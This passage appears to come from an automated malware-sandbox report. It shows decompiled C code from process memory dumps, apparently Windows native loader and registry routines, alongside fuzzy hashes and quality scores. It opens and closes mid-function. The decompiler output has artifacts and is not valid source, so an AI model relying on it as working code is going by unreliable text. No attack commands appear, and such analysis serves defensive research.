                        										L02BB77F0(_t215, _t236,  *(_t237 - 0x78));
                        										goto L20;
                        									}
                        									__eflags =  *((char*)(_t237 - 0x39));
                        									if( *((char*)(_t237 - 0x39)) != 0) {
                        										_t233 = E02BCA44B( *(_t237 - 0x4c));
                        										 *(_t237 - 0x50) = _t233;
                        										__eflags = _t233;
                        										if(_t233 == 0) {
                        											L02BB77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                        											goto L52;
                        										}
                        										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                        										L17:
                        										_t234 =  *(_t237 - 0x40);
                        										_t218 = _t234 * 0xc;
                        										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                        										 *(_t218 + _t235 + 0x10) = _t236;
                        										_t224 = _t234 + 1;
                        										 *(_t237 - 0x40) = _t224;
                        										 *(_t237 - 0x50) = _t224;
                        										_t193 =  *(_t237 - 0x44);
                        										continue;
                        									}
                        									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                        									goto L17;
                        								}
                        								 *_t235 = _t236;
                        								_t165 = 0x10 + _t163 * 0xc;
                        								__eflags = _t165;
                        								_push(_t165);
                        								_push(_t235);
                        								_push(0x23);
                        								_push(0xffffffff);
                        								_t193 = E02BD96C0();
                        								goto L19;
                        							} else {
                        								goto L50;
                        							}
                        						}
                        						_t235 = _t237 - 0x38;
                        						 *(_t237 - 0x60) = _t235;
                        						goto L8;
                        					}
                        					goto L4;
                        				}
                        			}


































                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ca165ac8219114522425fa1dc045665369cc9972c6438ae43146a8fffbd950cf
                        • Instruction ID: 9de47ba73c2879512273812bdf21d43ca298ddf6b901594244a5b884b61b57d8
                        • Opcode Fuzzy Hash: ca165ac8219114522425fa1dc045665369cc9972c6438ae43146a8fffbd950cf
                        • Instruction Fuzzy Hash: A1B18C74E04249DFDB15DFA8C994BADFBB6FF48304F1481AAE505AB641EB70A845CF80
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 67%
                        			E02BC513A(intOrPtr __ecx, void* __edx) {
                        				signed int _v8;
                        				signed char _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				char _v28;
                        				signed int _v32;
                        				signed int _v36;
                        				signed int _v40;
                        				intOrPtr _v44;
                        				intOrPtr _v48;
                        				char _v63;
                        				char _v64;
                        				signed int _v72;
                        				signed int _v76;
                        				signed int _v80;
                        				signed int _v84;
                        				signed int _v88;
                        				signed char* _v92;
                        				signed int _v100;
                        				signed int _v104;
                        				char _v105;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* _t157;
                        				signed int _t159;
                        				signed int _t160;
                        				unsigned int* _t161;
                        				intOrPtr _t165;
                        				signed int _t172;
                        				signed char* _t181;
                        				intOrPtr _t189;
                        				intOrPtr* _t200;
                        				signed int _t202;
                        				signed int _t203;
                        				char _t204;
                        				signed int _t207;
                        				signed int _t208;
                        				void* _t209;
                        				intOrPtr _t210;
                        				signed int _t212;
                        				signed int _t214;
                        				signed int _t221;
                        				signed int _t222;
                        				signed int _t226;
                        				intOrPtr* _t232;
                        				signed int _t233;
                        				signed int _t234;
                        				intOrPtr _t237;
                        				intOrPtr _t238;
                        				intOrPtr _t240;
                        				void* _t245;
                        				signed int _t246;
                        				signed int _t247;
                        				void* _t248;
                        				void* _t251;
                        				void* _t252;
                        				signed int _t253;
                        				signed int _t255;
                        				signed int _t256;
                        
                        				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                        				_v8 =  *0x2c8d360 ^ _t255;
                        				_v32 = _v32 & 0x00000000;
                        				_t251 = __edx;
                        				_t237 = __ecx;
                        				_t212 = 6;
                        				_t245 =  &_v84;
                        				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                        				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                        				_v48 = __ecx;
                        				_v36 = _t207;
                        				_t157 = memset(_t245, 0, _t212 << 2);
                        				_t256 = _t255 + 0xc;
                        				_t246 = _t245 + _t212;
                        				if(_t207 == 2) {
                        					_t247 =  *(_t237 + 0x60);
                        					_t208 =  *(_t237 + 0x64);
                        					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                        					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                        					_v104 = _t159;
                        					_v76 = _t159;
                        					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                        					_v100 = _t160;
                        					_v72 = _t160;
                        					L19:
                        					_v80 = _t208;
                        					_v84 = _t247;
                        					L8:
                        					_t214 = 0;
                        					if( *(_t237 + 0x74) > 0) {
                        						_t82 = _t237 + 0x84; // 0x124
                        						_t161 = _t82;
                        						_v92 = _t161;
                        						while( *_t161 >> 0x1f != 0) {
                        							_t200 = _v92;
                        							if( *_t200 == 0x80000000) {
                        								break;
                        							}
                        							_t214 = _t214 + 1;
                        							_t161 = _t200 + 0x10;
                        							_v92 = _t161;
                        							if(_t214 <  *(_t237 + 0x74)) {
                        								continue;
                        							}
                        							goto L9;
                        						}
                        						_v88 = _t214 << 4;
                        						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                        						_t165 = 0;
                        						asm("adc eax, [ecx+edx+0x7c]");
                        						_v24 = _t165;
                        						_v28 = _v40;
                        						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                        						_t221 = _v40;
                        						_v16 =  *_v92;
                        						_v32 =  &_v28;
                        						if( *(_t237 + 0x4e) >> 0xf == 0) {
                        							goto L9;
                        						}
                        						_t240 = _v48;
                        						if( *_v92 != 0x80000000) {
                        							goto L9;
                        						}
                        						 *((intOrPtr*)(_t221 + 8)) = 0;
                        						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                        						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                        						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                        						_t226 = 0;
                        						_t181 = _t251 + 0x66;
                        						_v88 = 0;
                        						_v92 = _t181;
                        						do {
                        							if( *((char*)(_t181 - 2)) == 0) {
                        								goto L31;
                        							}
                        							_t226 = _v88;
                        							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                        								_t181 = E02BDD0F0(1, _t226 + 0x20, 0);
                        								_t226 = _v40;
                        								 *(_t226 + 8) = _t181;
                        								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                        								L34:
                        								if(_v44 == 0) {
                        									goto L9;
                        								}
                        								_t210 = _v44;
                        								_t127 = _t210 + 0x1c; // 0x1c
                        								_t249 = _t127;
                        								E02BB2280(_t181, _t127);
                        								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                        								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                        								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                        									L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                        								}
                        								_t189 = L02BB4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                        								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                        								if(_t189 != 0) {
                        									 *((intOrPtr*)(_t189 + 8)) = _v20;
                        									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                        									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                        									 *_t232 = _t232 + 0x10;
                        									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                        									E02BDF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                        									_t256 = _t256 + 0xc;
                        								}
                        								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                        								E02BAFFB0(_t210, _t249, _t249);
                        								_t222 = _v76;
                        								_t172 = _v80;
                        								_t208 = _v84;
                        								_t247 = _v88;
                        								L10:
                        								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                        								_v44 = _t238;
                        								if(_t238 != 0) {
                        									 *0x2c8b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                        									_v44();
                        								}
                        								_pop(_t248);
                        								_pop(_t252);
                        								_pop(_t209);
                        								return E02BDB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                        							}
                        							_t181 = _v92;
                        							L31:
                        							_t226 = _t226 + 1;
                        							_t181 =  &(_t181[0x18]);
                        							_v88 = _t226;
                        							_v92 = _t181;
                        						} while (_t226 < 4);
                        						goto L34;
                        					}
                        					L9:
                        					_t172 = _v104;
                        					_t222 = _v100;
                        					goto L10;
                        				}
                        				_t247 = _t246 | 0xffffffff;
                        				_t208 = _t247;
                        				_v84 = _t247;
                        				_v80 = _t208;
                        				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                        					_t233 = _v72;
                        					_v105 = _v64;
                        					_t202 = _v76;
                        				} else {
                        					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                        					_v105 = 1;
                        					if(_v63 <= _t204) {
                        						_v63 = _t204;
                        					}
                        					_t202 = _v76 |  *(_t251 + 0x40);
                        					_t233 = _v72 |  *(_t251 + 0x44);
                        					_t247 =  *(_t251 + 0x38);
                        					_t208 =  *(_t251 + 0x3c);
                        					_v76 = _t202;
                        					_v72 = _t233;
                        					_v84 = _t247;
                        					_v80 = _t208;
                        				}
                        				_v104 = _t202;
                        				_v100 = _t233;
                        				if( *((char*)(_t251 + 0xc4)) != 0) {
                        					_t237 = _v48;
                        					_v105 = 1;
                        					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                        						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                        						_t237 = _v48;
                        					}
                        					_t203 = _t202 |  *(_t251 + 0xb8);
                        					_t234 = _t233 |  *(_t251 + 0xbc);
                        					_t247 = _t247 &  *(_t251 + 0xb0);
                        					_t208 = _t208 &  *(_t251 + 0xb4);
                        					_v104 = _t203;
                        					_v76 = _t203;
                        					_v100 = _t234;
                        					_v72 = _t234;
                        					_v84 = _t247;
                        					_v80 = _t208;
                        				}
                        				if(_v105 == 0) {
                        					_v36 = _v36 & 0x00000000;
                        					_t208 = 0;
                        					_t247 = 0;
                        					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                        					goto L19;
                        				} else {
                        					_v36 = 1;
                        					goto L8;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 34fae4fc96325042884092c1bd8817d94033d1a8244b6327e933c794daa58479
                        • Instruction ID: 7fd371024edd3f5eb6bee438c66ddfbfc3263e270f178f8e5bd1c46b5ab118eb
                        • Opcode Fuzzy Hash: 34fae4fc96325042884092c1bd8817d94033d1a8244b6327e933c794daa58479
                        • Instruction Fuzzy Hash: 55C114755093818FD354CF28C580A5AFBF1BF88308F2449ADF8999B392D771E945CB52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 74%
                        			E02BC03E2(signed int __ecx, signed int __edx) {
                        				signed int _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				signed int _v20;
                        				signed int _v24;
                        				signed int _v28;
                        				signed int _v32;
                        				signed int _v36;
                        				intOrPtr _v40;
                        				signed int _v44;
                        				signed int _v48;
                        				char _v52;
                        				char _v56;
                        				char _v64;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t56;
                        				signed int _t58;
                        				char* _t64;
                        				intOrPtr _t65;
                        				signed int _t74;
                        				signed int _t79;
                        				char* _t83;
                        				intOrPtr _t84;
                        				signed int _t93;
                        				signed int _t94;
                        				signed char* _t95;
                        				signed int _t99;
                        				signed int _t100;
                        				signed char* _t101;
                        				signed int _t105;
                        				signed int _t119;
                        				signed int _t120;
                        				void* _t122;
                        				signed int _t123;
                        				signed int _t127;
                        
                        				_v8 =  *0x2c8d360 ^ _t127;
                        				_t119 = __ecx;
                        				_t105 = __edx;
                        				_t118 = 0;
                        				_v20 = __edx;
                        				_t120 =  *(__ecx + 0x20);
                        				if(E02BC0548(__ecx, 0) != 0) {
                        					_t56 = 0xc000022d;
                        					L23:
                        					return E02BDB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                        				} else {
                        					_v12 = _v12 | 0xffffffff;
                        					_t58 = _t120 + 0x24;
                        					_t109 =  *(_t120 + 0x18);
                        					_t118 = _t58;
                        					_v16 = _t58;
                        					E02BAB02A( *(_t120 + 0x18), _t118, 0x14a5);
                        					_v52 = 0x18;
                        					_v48 = 0;
                        					0x840 = 0x40;
                        					if( *0x2c87c1c != 0) {
                        					}
                        					_v40 = 0x840;
                        					_v44 = _t105;
                        					_v36 = 0;
                        					_v32 = 0;
                        					if(E02BB7D50() != 0) {
                        						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        					} else {
                        						_t64 = 0x7ffe0384;
                        					}
                        					if( *_t64 != 0) {
                        						_t65 =  *[fs:0x30];
                        						__eflags =  *(_t65 + 0x240) & 0x00000004;
                        						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                        							_t100 = E02BB7D50();
                        							__eflags = _t100;
                        							if(_t100 == 0) {
                        								_t101 = 0x7ffe0385;
                        							} else {
                        								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        							}
                        							__eflags =  *_t101 & 0x00000020;
                        							if(( *_t101 & 0x00000020) != 0) {
                        								_t118 = _t118 | 0xffffffff;
                        								_t109 = 0x1485;
                        								E02C17016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                        							}
                        						}
                        					}
                        					_t105 = 0;
                        					while(1) {
                        						_push(0x60);
                        						_push(5);
                        						_push( &_v64);
                        						_push( &_v52);
                        						_push(0x100021);
                        						_push( &_v12);
                        						_t122 = E02BD9830();
                        						if(_t122 >= 0) {
                        							break;
                        						}
                        						__eflags = _t122 - 0xc0000034;
                        						if(_t122 == 0xc0000034) {
                        							L38:
                        							_t120 = 0xc0000135;
                        							break;
                        						}
                        						__eflags = _t122 - 0xc000003a;
                        						if(_t122 == 0xc000003a) {
                        							goto L38;
                        						}
                        						__eflags = _t122 - 0xc0000022;
                        						if(_t122 != 0xc0000022) {
                        							break;
                        						}
                        						__eflags = _t105;
                        						if(__eflags != 0) {
                        							break;
                        						}
                        						_t109 = _t119;
                        						_t99 = E02C169A6(_t119, __eflags);
                        						__eflags = _t99;
                        						if(_t99 == 0) {
                        							break;
                        						}
                        						_t105 = _t105 + 1;
                        					}
                        					if( !_t120 >= 0) {
                        						L22:
                        						_t56 = _t120;
                        						goto L23;
                        					}
                        					if( *0x2c87c04 != 0) {
                        						_t118 = _v12;
                        						_t120 = E02C1A7AC(_t119, _t118, _t109);
                        						__eflags = _t120;
                        						if(_t120 >= 0) {
                        							goto L10;
                        						}
                        						__eflags =  *0x2c87bd8;
                        						if( *0x2c87bd8 != 0) {
                        							L20:
                        							if(_v12 != 0xffffffff) {
                        								_push(_v12);
                        								E02BD95D0();
                        							}
                        							goto L22;
                        						}
                        					}
                        					L10:
                        					_push(_v12);
                        					_t105 = _t119 + 0xc;
                        					_push(0x1000000);
                        					_push(0x10);
                        					_push(0);
                        					_push(0);
                        					_push(0xf);
                        					_push(_t105);
                        					_t120 = E02BD99A0();
                        					if(_t120 < 0) {
                        						__eflags = _t120 - 0xc000047e;
                        						if(_t120 == 0xc000047e) {
                        							L51:
                        							_t74 = E02C13540(_t120);
                        							_t119 = _v16;
                        							_t120 = _t74;
                        							L52:
                        							_t118 = 0x1485;
                        							E02B9B1E1(_t120, 0x1485, 0, _t119);
                        							goto L20;
                        						}
                        						__eflags = _t120 - 0xc000047f;
                        						if(_t120 == 0xc000047f) {
                        							goto L51;
                        						}
                        						__eflags = _t120 - 0xc0000462;
                        						if(_t120 == 0xc0000462) {
                        							goto L51;
                        						}
                        						_t119 = _v16;
                        						__eflags = _t120 - 0xc0000017;
                        						if(_t120 != 0xc0000017) {
                        							__eflags = _t120 - 0xc000009a;
                        							if(_t120 != 0xc000009a) {
                        								__eflags = _t120 - 0xc000012d;
                        								if(_t120 != 0xc000012d) {
                        									_v28 = _t119;
                        									_push( &_v56);
                        									_push(1);
                        									_v24 = _t120;
                        									_push( &_v28);
                        									_push(1);
                        									_push(2);
                        									_push(0xc000007b);
                        									_t79 = E02BDAAF0();
                        									__eflags = _t79;
                        									if(_t79 >= 0) {
                        										__eflags =  *0x2c88474 - 3;
                        										if( *0x2c88474 != 3) {
                        											 *0x2c879dc =  *0x2c879dc + 1;
                        										}
                        									}
                        								}
                        							}
                        						}
                        						goto L52;
                        					}
                        					if(E02BB7D50() != 0) {
                        						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        					} else {
                        						_t83 = 0x7ffe0384;
                        					}
                        					if( *_t83 != 0) {
                        						_t84 =  *[fs:0x30];
                        						__eflags =  *(_t84 + 0x240) & 0x00000004;
                        						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                        							_t94 = E02BB7D50();
                        							__eflags = _t94;
                        							if(_t94 == 0) {
                        								_t95 = 0x7ffe0385;
                        							} else {
                        								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        							}
                        							__eflags =  *_t95 & 0x00000020;
                        							if(( *_t95 & 0x00000020) != 0) {
                        								E02C17016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                        							}
                        						}
                        					}
                        					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                        						if( *0x2c88708 != 0) {
                        							_t118 =  *0x7ffe0330;
                        							_t123 =  *0x2c87b00; // 0x0
                        							asm("ror esi, cl");
                        							 *0x2c8b1e0(_v12, _v20, 0x20);
                        							_t93 =  *(_t123 ^  *0x7ffe0330)();
                        							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                        							asm("sbb esi, esi");
                        							_t120 =  ~_t50 & _t93;
                        						} else {
                        							_t120 = 0;
                        						}
                        					}
                        					if( !_t120 >= 0) {
                        						L19:
                        						_push( *_t105);
                        						E02BD95D0();
                        						 *_t105 =  *_t105 & 0x00000000;
                        						goto L20;
                        					}
                        					_t120 = E02BA7F65(_t119);
                        					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                        						__eflags = _t120;
                        						if(_t120 < 0) {
                        							goto L19;
                        						}
                        						 *(_t119 + 0x64) = _v12;
                        						goto L22;
                        					}
                        					goto L19;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 02168286031c990de2e07b8c73a756822dc12d4b95ba4accfa8aeae2d21e981b
                        • Instruction ID: 58cd93a5e8099637849be147202044b33beb3eb6d07d3b9df6602e7c1714189f
                        • Opcode Fuzzy Hash: 02168286031c990de2e07b8c73a756822dc12d4b95ba4accfa8aeae2d21e981b
                        • Instruction Fuzzy Hash: F8912831E00754DFDB35AB68C884BBFB7B5EB41718F1906A5EA10A72D1DB749E00CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 67%
                        			E02B9C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                        				signed int _v8;
                        				char _v1036;
                        				signed int _v1040;
                        				char _v1048;
                        				signed int _v1052;
                        				signed char _v1056;
                        				void* _v1058;
                        				char _v1060;
                        				signed int _v1064;
                        				void* _v1068;
                        				intOrPtr _v1072;
                        				void* _v1084;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr _t70;
                        				intOrPtr _t72;
                        				signed int _t74;
                        				intOrPtr _t77;
                        				signed int _t78;
                        				signed int _t81;
                        				void* _t101;
                        				signed int _t102;
                        				signed int _t107;
                        				signed int _t109;
                        				signed int _t110;
                        				signed char _t111;
                        				signed int _t112;
                        				signed int _t113;
                        				signed int _t114;
                        				intOrPtr _t116;
                        				void* _t117;
                        				char _t118;
                        				void* _t120;
                        				char _t121;
                        				signed int _t122;
                        				signed int _t123;
                        				signed int _t125;
                        
                        				_t125 = (_t123 & 0xfffffff8) - 0x424;
                        				_v8 =  *0x2c8d360 ^ _t125;
                        				_t116 = _a4;
                        				_v1056 = _a16;
                        				_v1040 = _a24;
                        				if(E02BA6D30( &_v1048, _a8) < 0) {
                        					L4:
                        					_pop(_t117);
                        					_pop(_t120);
                        					_pop(_t101);
                        					return E02BDB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                        				}
                        				_t70 = _a20;
                        				if(_t70 >= 0x3f4) {
                        					_t121 = _t70 + 0xc;
                        					L19:
                        					_t107 =  *( *[fs:0x30] + 0x18);
                        					__eflags = _t107;
                        					if(_t107 == 0) {
                        						L60:
                        						_t68 = 0xc0000017;
                        						goto L4;
                        					}
                        					_t72 =  *0x2c87b9c; // 0x0
                        					_t74 = L02BB4620(_t107, _t107, _t72 + 0x180000, _t121);
                        					_v1064 = _t74;
                        					__eflags = _t74;
                        					if(_t74 == 0) {
                        						goto L60;
                        					}
                        					_t102 = _t74;
                        					_push( &_v1060);
                        					_push(_t121);
                        					_push(_t74);
                        					_push(2);
                        					_push( &_v1048);
                        					_push(_t116);
                        					_t122 = E02BD9650();
                        					__eflags = _t122;
                        					if(_t122 >= 0) {
                        						L7:
                        						_t114 = _a12;
                        						__eflags = _t114;
                        						if(_t114 != 0) {
                        							_t77 = _a20;
                        							L26:
                        							_t109 =  *(_t102 + 4);
                        							__eflags = _t109 - 3;
                        							if(_t109 == 3) {
                        								L55:
                        								__eflags = _t114 - _t109;
                        								if(_t114 != _t109) {
                        									L59:
                        									_t122 = 0xc0000024;
                        									L15:
                        									_t78 = _v1052;
                        									__eflags = _t78;
                        									if(_t78 != 0) {
                        										L02BB77F0( *( *[fs:0x30] + 0x18), 0, _t78);
                        									}
                        									_t68 = _t122;
                        									goto L4;
                        								}
                        								_t110 = _v1056;
                        								_t118 =  *((intOrPtr*)(_t102 + 8));
                        								_v1060 = _t118;
                        								__eflags = _t110;
                        								if(_t110 == 0) {
                        									L10:
                        									_t122 = 0x80000005;
                        									L11:
                        									_t81 = _v1040;
                        									__eflags = _t81;
                        									if(_t81 == 0) {
                        										goto L15;
                        									}
                        									__eflags = _t122;
                        									if(_t122 >= 0) {
                        										L14:
                        										 *_t81 = _t118;
                        										goto L15;
                        									}
                        									__eflags = _t122 - 0x80000005;
                        									if(_t122 != 0x80000005) {
                        										goto L15;
                        									}
                        									goto L14;
                        								}
                        								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                        								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                        									goto L10;
                        								}
                        								_push( *((intOrPtr*)(_t102 + 8)));
                        								_t59 = _t102 + 0xc; // 0xc
                        								_push(_t110);
                        								L54:
                        								E02BDF3E0();
                        								_t125 = _t125 + 0xc;
                        								goto L11;
                        							}
                        							__eflags = _t109 - 7;
                        							if(_t109 == 7) {
                        								goto L55;
                        							}
                        							_t118 = 4;
                        							__eflags = _t109 - _t118;
                        							if(_t109 != _t118) {
                        								__eflags = _t109 - 0xb;
                        								if(_t109 != 0xb) {
                        									__eflags = _t109 - 1;
                        									if(_t109 == 1) {
                        										__eflags = _t114 - _t118;
                        										if(_t114 != _t118) {
                        											_t118 =  *((intOrPtr*)(_t102 + 8));
                        											_v1060 = _t118;
                        											__eflags = _t118 - _t77;
                        											if(_t118 > _t77) {
                        												goto L10;
                        											}
                        											_push(_t118);
                        											_t56 = _t102 + 0xc; // 0xc
                        											_push(_v1056);
                        											goto L54;
                        										}
                        										__eflags = _t77 - _t118;
                        										if(_t77 != _t118) {
                        											L34:
                        											_t122 = 0xc0000004;
                        											goto L15;
                        										}
                        										_t111 = _v1056;
                        										__eflags = _t111 & 0x00000003;
                        										if((_t111 & 0x00000003) == 0) {
                        											_v1060 = _t118;
                        											__eflags = _t111;
                        											if(__eflags == 0) {
                        												goto L10;
                        											}
                        											_t42 = _t102 + 0xc; // 0xc
                        											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                        											_v1048 =  *((intOrPtr*)(_t102 + 8));
                        											_push(_t111);
                        											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                        											_push(0);
                        											_push( &_v1048);
                        											_t122 = E02BD13C0(_t102, _t118, _t122, __eflags);
                        											L44:
                        											_t118 = _v1072;
                        											goto L11;
                        										}
                        										_t122 = 0x80000002;
                        										goto L15;
                        									}
                        									_t122 = 0xc0000024;
                        									goto L44;
                        								}
                        								__eflags = _t114 - _t109;
                        								if(_t114 != _t109) {
                        									goto L59;
                        								}
                        								_t118 = 8;
                        								__eflags = _t77 - _t118;
                        								if(_t77 != _t118) {
                        									goto L34;
                        								}
                        								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                        								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                        									goto L34;
                        								}
                        								_t112 = _v1056;
                        								_v1060 = _t118;
                        								__eflags = _t112;
                        								if(_t112 == 0) {
                        									goto L10;
                        								}
                        								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                        								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                        								goto L11;
                        							}
                        							__eflags = _t114 - _t118;
                        							if(_t114 != _t118) {
                        								goto L59;
                        							}
                        							__eflags = _t77 - _t118;
                        							if(_t77 != _t118) {
                        								goto L34;
                        							}
                        							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                        							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                        								goto L34;
                        							}
                        							_t113 = _v1056;
                        							_v1060 = _t118;
                        							__eflags = _t113;
                        							if(_t113 == 0) {
                        								goto L10;
                        							}
                        							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                        							goto L11;
                        						}
                        						_t118 =  *((intOrPtr*)(_t102 + 8));
                        						__eflags = _t118 - _a20;
                        						if(_t118 <= _a20) {
                        							_t114 =  *(_t102 + 4);
                        							_t77 = _t118;
                        							goto L26;
                        						}
                        						_v1060 = _t118;
                        						goto L10;
                        					}
                        					__eflags = _t122 - 0x80000005;
                        					if(_t122 != 0x80000005) {
                        						goto L15;
                        					}
                        					L02BB77F0( *( *[fs:0x30] + 0x18), 0, _t102);
                        					L18:
                        					_t121 = _v1060;
                        					goto L19;
                        				}
                        				_push( &_v1060);
                        				_push(0x400);
                        				_t102 =  &_v1036;
                        				_push(_t102);
                        				_push(2);
                        				_push( &_v1048);
                        				_push(_t116);
                        				_t122 = E02BD9650();
                        				if(_t122 >= 0) {
                        					__eflags = 0;
                        					_v1052 = 0;
                        					goto L7;
                        				}
                        				if(_t122 == 0x80000005) {
                        					goto L18;
                        				}
                        				goto L4;
                        			}

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0289926317676a65d853dd0cc3bc058bec870af574047e6e1d2bd971d7d6c9f1
                        • Instruction ID: b4c2d18029c5e830e5e26832a046ec1f4e4345f87afdeb7894b984141f85a137
                        • Opcode Fuzzy Hash: 0289926317676a65d853dd0cc3bc058bec870af574047e6e1d2bd971d7d6c9f1
                        • Instruction Fuzzy Hash: 70818F75A442459BCB29CF15C8C0B7AF7A9FB88354F14496AED459B280D330FE49CBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 39%
                        			E02C2B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                        				char _v8;
                        				signed int _v12;
                        				signed int _t80;
                        				signed int _t83;
                        				intOrPtr _t89;
                        				signed int _t92;
                        				signed char _t106;
                        				signed int* _t107;
                        				intOrPtr _t108;
                        				intOrPtr _t109;
                        				signed int _t114;
                        				void* _t115;
                        				void* _t117;
                        				void* _t119;
                        				void* _t122;
                        				signed int _t123;
                        				signed int* _t124;
                        
                        				_t106 = _a12;
                        				if((_t106 & 0xfffffffc) != 0) {
                        					return 0xc000000d;
                        				}
                        				if((_t106 & 0x00000002) != 0) {
                        					_t106 = _t106 | 0x00000001;
                        				}
                        				_t109 =  *0x2c87b9c; // 0x0
                        				_t124 = L02BB4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                        				if(_t124 != 0) {
                        					 *_t124 =  *_t124 & 0x00000000;
                        					_t124[1] = _t124[1] & 0x00000000;
                        					_t124[4] = _t124[4] & 0x00000000;
                        					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                        						L13:
                        						_push(_t124);
